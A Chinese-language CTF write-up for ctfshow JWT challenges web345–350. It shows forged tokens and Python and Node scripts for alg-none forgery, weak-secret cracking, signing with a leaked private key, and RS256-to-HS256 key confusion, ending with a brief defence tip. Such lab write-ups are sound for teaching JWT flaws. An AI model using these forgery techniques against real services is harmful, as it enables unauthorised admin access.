ctfshow - web345- 350 - jwt
题目都是ctfshow的,版权是ctfshow的!!!!!!如果侵权,联系立马删除
web345
my thought
看到源码后,访问/admin,没发现啥东西
看看auth
eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3siaXNzIjoiYWRtaW4iLCJpYXQiOjE2NTIyMzcxMjgsImV4cCI6MTY1MjI0NDMyOCwibmJmIjoxNjUyMjM3MTI4LCJzdWIiOiJ1c2VyIiwianRpIjoiNDJmYWQ1NzlhNzEzZTE1NjczNzQ2Yzc5MTBkM2MzMmEifV0
->
eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3siaXNzIjoiYWRtaW4iLCJpYXQiOjE2NTIyMzcxMjgsImV4cCI6MTY1MjI0NDMyOCwibmJmIjoxNjUyMjM3MTI4LCJzdWIiOiJhZG1pbiIsImp0aSI6IjQyZmFkNTc5YTcxM2UxNTY3Mzc0NmM3OTEwZDNjMzJhIn1d
eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3sic3ViIjoiYWRtaW4ifV0发现没有签名认证部分,直接修改cookie,访问/admin/
web346——修改签名算法
题目
该题的cookie中使用hs256
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTY1MzIwODQ5MywiZXhwIjoxNjUzMjE1NjkzLCJuYmYiOjE2NTMyMDg0OTMsInN1YiI6InVzZXIiLCJqdGkiOiIzNjE5NjFhNjM0YTU3MzJhYTUzMmYyZmU5MDhmYmE0MiJ9.K8EAszlFstvCfSdR_Q9-qwX8nBBpa366Q7VCyvEKAecright way
将header的加密算法改为none,跑出cookie
import jwt
# payload
token_dict = {
"iss": "admin",
"iat": 1653273637,
"exp": 1653280837,
"nbf": 1653273637,
"sub": "admin",
"jti": "8219ad40fe3524c013409606c9d9ecfc"
}
headers = {
"alg": "none",
"typ": "JWT"
}
jwt_token = jwt.encode(token_dict, # payload, 有效载体
"", # 进行加密签名的密钥
algorithm="none", # 指明签名算法方式, 默认也是HS256
headers=headers
# json web token 数据结构包含两部分, payload(有效载体), headers(标头)
)
print(jwt_token)
该方法跑了后修改cookie没用。
密钥为123456,在jwt.io获得新的cookie。
web347
题目
同上
web348——爆破
题目
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTY1MzI3NTY1NCwiZXhwIjoxNjUzMjgyODU0LCJuYmYiOjE2NTMyNzU2NTQsInN1YiI6InVzZXIiLCJqdGkiOiJhOWY4ZGRlNzBjNDdlNWM1N2YxYWI3OTRlMTliNzkwOSJ9.2S40MftC-VtFmAOhkCDxkUkc4ktvt8YRkoDFv1nwElQmy thought
上c-jwt-cracker
密钥为aaab,在jwt.io生成新的cookie。
web349——RSA公私钥泄露
题目
app.js
/* GET home page. */
router.get('/', function(req, res, next) {
res.type('html');
var privateKey = fs.readFileSync(process.cwd()+'//public//private.key');
var token = jwt.sign({ user: 'user' }, privateKey, { algorithm: 'RS256' });
res.cookie('auth',token);
res.end('where is flag?');
});
router.post('/',function(req,res,next){
var flag="flag_here";
res.type('html');
var auth = req.cookies.auth;
var cert = fs.readFileSync(process.cwd()+'//public/public.key'); // get public key
jwt.verify(auth, cert, function(err, decoded) {
if(decoded.user==='admin'){
res.end(flag);
}else{
res.end('you are not admin');
}
});
});right way
看代码发现public.key和private.key均放在public目录下,猜测可以直接访问。
发现公私钥泄露。
payload
node
const jwt = require('jsonwebtoken');
var fs = require('fs');
var privateKey = fs.readFileSync('private.key');
var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'RS256' });
console.log(token)python2
import jwt
public = open('private.key', 'r').read()
payload={"user":"admin"}
print(jwt.encode(payload, key=public, algorithm='RS256'))
# python2运行jwt.io也可以,不过尝试后认证失败
web350——密钥混淆攻击
题目
该题给了环境,routes/index.js中仅有公钥信息,
right way
将rs256改为hs256
payload
const jwt = require('jsonwebtoken');
var fs = require('fs');
var privateKey = fs.readFileSync('public.key');
var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'HS256' });
console.log(token)防御
JWT配置应该只允许使用HMAC算法或公钥算法,决不能同时使用这两种算法——by Y4tacker
参考
https://blog.csdn.net/solitudi/article/details/112525267
https://blog.csdn.net/cosmoslin/article/details/120540470
https://blog.csdn.net/cosmoslin/article/details/120540470